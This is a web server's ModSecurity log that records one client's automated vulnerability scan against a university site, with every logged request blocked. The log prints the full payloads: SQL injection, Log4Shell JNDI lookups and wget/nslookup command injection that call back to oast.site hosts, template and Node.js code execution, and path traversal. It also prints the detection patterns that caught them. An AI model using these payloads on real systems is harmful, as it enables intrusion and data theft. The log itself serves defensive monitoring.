[Tue Aug 29 11:31:52.425112 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAQNwJoAAAAv"]
[Tue Aug 29 11:31:53.311040 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQQyn4AAAAy"]
[Tue Aug 29 11:31:53.388102 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAAPDn@0AAAAP"]
[Tue Aug 29 11:31:54.393391 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10usCo-f0AAAQNwKUAAAAv"]
[Tue Aug 29 11:31:54.407836 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAQSWPkAAAA0"]
[Tue Aug 29 11:31:55.372492 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAQV4QwAAAA3"]
[Tue Aug 29 11:31:56.321642 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vMCo-f0AAAP5mMsAAAAM"]
[Tue Aug 29 11:31:56.394470 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgeyhfdn1nkawmo.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQR49YAAAAz"]
[Tue Aug 29 11:31:57.339673 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vcCo-f0AAANsAWcAAAAD"]
[Tue Aug 29 11:31:57.420634 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vcCo-f0AAAQR490AAAAz"]
[Tue Aug 29 11:31:58.357761 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vsCo-f0AAAP5mNMAAAAM"]
[Tue Aug 29 11:31:58.387379 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAPDoAsAAAAP"]
[Tue Aug 29 11:31:59.318961 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg5nu817a74jxce.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAP@M4wAAAAZ"]
[Tue Aug 29 11:31:59.363879 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10v8Co-f0AAAQkBaMAAAAC"]
[Tue Aug 29 11:32:04.352906 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAANsAXwAAAAD"]
[Tue Aug 29 11:32:05.490581 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQR4-EAAAAz"]
[Tue Aug 29 11:32:06.376231 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAP8G3gAAAAV"]
[Tue Aug 29 11:32:06.421437 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAQ7NGYAAAAH"]
[Tue Aug 29 11:32:07.823216 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAP8G38AAAAV"]
[Tue Aug 29 11:32:08.378238 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQV4TcAAAA3"]
[Tue Aug 29 11:32:10.335411 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgrekremhbq79fx.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAANWgXkAAAAG"]
[Tue Aug 29 11:32:10.416414 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgn5mmgz31ssa5i.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAANWgX0AAAAG"]
[Tue Aug 29 11:32:12.349341 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQMr0QAAAAu"]
[Tue Aug 29 11:32:13.311630 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQMr0cAAAAu"]
[Tue Aug 29 11:32:13.316245 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgkccxs5fwyp4po.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgkccxs5fwyp4po.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQ7NHUAAAAH"]
[Tue Aug 29 11:32:15.348247 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQ9H04AAAAK"]
[Tue Aug 29 11:32:15.426794 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfkip.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQOv7wAAAAw"]
[Tue Aug 29 11:32:15.426831 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQOv7wAAAAw"]
[Tue Aug 29 11:32:15.426867 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ9H1IAAAAK"]
[Tue Aug 29 11:32:16.307122 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAANsAZ8AAAAD"]
[Tue Aug 29 11:32:17.311462 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAN9sUYAAAAJ"]
